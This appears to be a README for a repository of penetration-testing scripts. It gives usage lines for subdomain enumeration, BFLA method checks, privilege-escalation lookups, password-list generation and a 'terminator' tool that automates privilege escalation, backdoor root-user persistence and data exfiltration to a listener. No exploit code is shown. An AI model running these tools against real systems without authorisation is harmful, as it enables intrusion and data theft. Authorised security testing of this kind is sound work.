repo for various pentesting scripts to make life easier
get the scripts ready to use
sudo bash setup.sh
Test each HTTP method on an endpoint to find potential BFLA vulnerabilities
method-check -u https://domain.com/api/v2/users/1
Find active subdomains using subfinder, assetfinder, amass, httprobe, crt.sh, katana, and waybackurls.
subdomain-annihilator -d <domain.com>
subdomain-annihilator -f <domains.txt>
Search GTFObins for privesc vectors for suid files
binq <suid-files-list.txt>
cmd.py is a Python script that provides quick access to 50 pentesting commands for enumeration, exploitation, and privilege escalation.
cmds <target_ip>
automate network scanning (discovery, ports, services, vulnerabilities)
nmapper <target_ip>
automate web enumeration (subdomains, directory fuzzing, web vulnerabilities, etc.)
webrecon <domain.com>
Fuzzler is a penetration testing tool that generates tailored password lists from webpages using Artificial Intelligence/Natural Language Processing
fuzzler -t <target-ip> -p <target-port>
This script quickly downloads and runs the OWASP juice shop docker image for testing web/api vulnerabilities.
juice-up
This script attempts to take rows of raw data and format it into a markdown table (e.g. for Obsidian notes)
python3 md-table-gen.py [file-name] [delimeter char (optional)]
the final password list will be in 'fuzzes.txt'
a tool for automating common techniques for the enumeration, privilege escalation, persistence, exfiltration, and reporting stages of a pentest
| terminator usage:
(stage 1-enumerating target from local machine):
terminator enum -t <target_ip_to_enumerate> (optional: -w <path_to_directory_wordlist> (otherwise, terminator will use default list))
(stage 2-privilege escalation after gaining shell on target machine):
terminator priv -u <new_root_username> -p <new_root_passwd>
(stage 3-persistence/data exfiltration after gaining root privileges on target machine):
terminator root -u <new_user_name> -p <new_user_passwd> -l <local_ip> -x <local_listening_port> (optional: -f (bypass root permissions check))
(stage 4-create report on local machine):
terminator report -o <output_file_name>